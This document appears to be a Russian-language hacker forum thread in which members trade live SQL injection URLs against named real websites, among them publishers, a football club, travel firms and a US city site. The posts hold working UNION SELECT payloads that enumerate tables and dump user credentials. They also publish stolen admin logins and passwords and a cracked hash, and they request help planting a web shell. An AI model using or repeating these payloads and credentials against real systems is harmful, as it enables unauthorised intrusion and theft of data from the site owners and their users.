Любителям "ЛЮДИ-Х" login.php но аплоадит только джпеги, правда особо не разбиралса... ================================================================ version 4.1.22-standard-log User lancsfire@localhost
решил попробавать добить этот сайт, но таблицу форума нашол http://ledi.ru/news.php?id=-13+union+select+1,2,3,table_name,5,6+from+INFORMATION_SCHEMA.TABLES+limit+70,1&te=0 а поюзать я её не могу вот http://ledi.ru/news.php?id=-13+union+select+1,2,3,column_name,5,6+from+INFOTMATION_SCHEMA.COLUMNS+where+table_name=0x6962665f6d6f64657261746f7273&te=0 0x6962665f6d6f64657261746f7273 = ibf_moderators -------------- если кто зделает, покажите?
sabe, можеш пояснить, вот это "unhex(hex" ? для чего это нужно? и откуда ты получил вот эту таблицу? " member_login_key"
SeNaP hex() - это конвертация стринга в хекс.. unhex() - обратная функция... используем эту конструкцию вместе чтобы не было таких ошибок как у тебя member_login_key - это стандартное поле где хранятся пассы от IPB
Все читают книжки? xD Издательство "Эксмо" http://www.eksmo.ru/catalog/book?b=1' http://www.eksmo.ru/catalog/book?b=61308+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5/* 4.0.21-standard-log Издательство "Народное" http://literati.ru/list4.php?rub=1' http://literati.ru/list4.php?rub=-1+union+select+1,2,3,4/* 4.1.22-log
Мой нормальный SQL-inJ =) А теперь после книжек идем на рыбалку -------------- Базы ДанныХ http://www.flyfishinginnh.com/news.php?id=-13+union+select+1,table_name,3+from+INFORMATION_SCHEMA.TABLES&limit=0 -------------- Таблицы в форуме http://www.flyfishinginnh.com/news.php?id=-13+union+select+1,column_name,3+from+INFORMATION_SCHEMA.COLUMNS+where+table_name='phpbb_users'&limit=0 --------------- Юзеры форума КЕШ(пароль не расшифрованный) = ЛОГИН http://www.flyfishinginnh.com/news.php?id=-13+union+select+1,(concat_ws(0x3d,user_password,username)),3+from+phpbb_users&limit=0 ---------------- Форум _http://www.flyfishinginnh.com/forum/ логин:admin Пароль: 1 или brookie21 так как я по английскому не хрена не шарю пороль 1 или brookie21 Логин: admin ----------------- Кто сможет залить шел, отпишитесь пожалуйчто в ЛС
SeNaP admin;brookie21 но форум не тот что ты указал это булка. у тебя хеш от phpbb ищи phpbb дам шелл нету phpbb ищи в базе поля от vb +))))))))
Давайте посетим сайт футбольного клуба Анжи. http://www.fc-anji.ru Code: http://www.fc-anji.ru/news.php?id=-341+union+select+1,concat_ws(version(),0x3a,user(),0x3a,database()),3,4,5,6/* version() - 4.1.22 user() - opendag@localhost database() - wwwopendagru Раскрытие пути: /www/opendag/users/opendag-fcanji/www/htdocs/news.php К information_schema и mysql.user доступа нету(
http://www.nord-east.ru/index.php?id=-1111+union+select+1,table_name,3,4+from+information_schema.tables+limit+0,1-- Строительная компания какая-то -) только в табличках нифига толкового нету.
Турфирма Эл ь ф-СПб http://www.bustur.ru Code: http://www.bustur.ru/t.php?id=-1+union+select+1,2,3,concat_ws(version(),0x3a,user(),0x3a,database())-- version() - 5.1.19-beta user() - petrotour@localhost database() - petrotour Есть контакт! Пошли таблички: Code: http://www.bustur.ru/t.php?id=-1+union+select+1,2,3,table_name+from+information_schema.tables-- ---------------------------------------------------------------- http://santechmart.ru Code: http://santechmart.ru/print.php?id=-1+union+select+concat_ws(version(),0x3a,user(),0x3a,database())-- version() - 5.0.41-log user() - [email protected] database() - santechmartru Табличке: Code: http://santechmart.ru/print.php?id=-1+union+select+table_name+from+information_schema.tables+limit+1,1-- Перебирать по: 2,1 ; 3,1 ; 4,1 и т.д.
http://www.pc-olymp.ru/gymnastik/index.php3?page=-1+union+select+concat(login,0x3a3a,pwd),2,3,4+from%20+users+limit+0,10/* админка http://www.pc-olymp.ru/admin/ пароль и пасс admin;admin
Америкосовские сайтеги... ы) http://www.fairelections.us Code: http://www.fairelections.us/article.php?id=-104+union+select+1,2,unhex(hex(version())),4,5-- version() - 5.0.45-community-log user() - ourcoupl_fairele@localhost database() - ourcoupl_fairelections От вывода инфы я офигел. Еле-еле-еле нашел. В общем снизу слева есть ссылочка: "Printer Safe Version", смотрим ее и видим интересующую нас инфу. Таблички перебираем лимитом limit+2,1 ; 3,1 и т.д. Code: http://www.fairelections.us/article.php?id=-104+union+select+1,2,table_name,4,5+from+information_schema.tables+limit+2,1--
Ну что? Давайте пойдем покрупнее. The City of Bremerton, WA http://www.ci.bremerton.wa.us На этом сайте я вообще вывода почти не нашел если бы НЕ циферка в коде, попавшаяся мне на глаза Code: http://www.ci.bremerton.wa.us/display.php?id=1039+union+select+1,2,unhex(hex(version())),4,5,6,7,8,9,10,11,12,13,14/* version() - 4.1.12-log user() - bremcity@localhost database() - bremcity Гуд выводы пошли, хорошо шифруются
Code: http://www.host-sweet.com/profile/host.php?id=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7/* Code: http://www.demonews.de/artikel/index.php?artikel=1+UNION+SELECT+concat_ws(0x3a,version(),database(),user())/*
Code: http://progmusic.ru/space/discography.php?id=-5+union+select+1,2,(concat_ws(0x3d,user_pass,user_fname,user_mail)),4,5,6,7,8+from+admin_users+limit+0,1-- Пасс=логин=мыло вот только я с с паролями разобратся не смог, это же ведь не MD5, и как и брутить?
2 SeNaP А хэши по-твоему только md5 в природе существуют ? По длине хэша, это скорее всего mysql хэш, брутить Passwords Pro www.hashcracking.info рулит 43e9a4ab75570f5b : admin 2 geforse Пипл, вы пистец, вы статьи читайте. С чего ты решил что полей 8 ? Unknown column '8' in 'order clause' И для вопросов существует отдельная тема. Джифорс, читай статьи. Эмм, сначала я прогнал, решив, что полей два. Пасиба .Begemot.'y, который меня поправил ^^
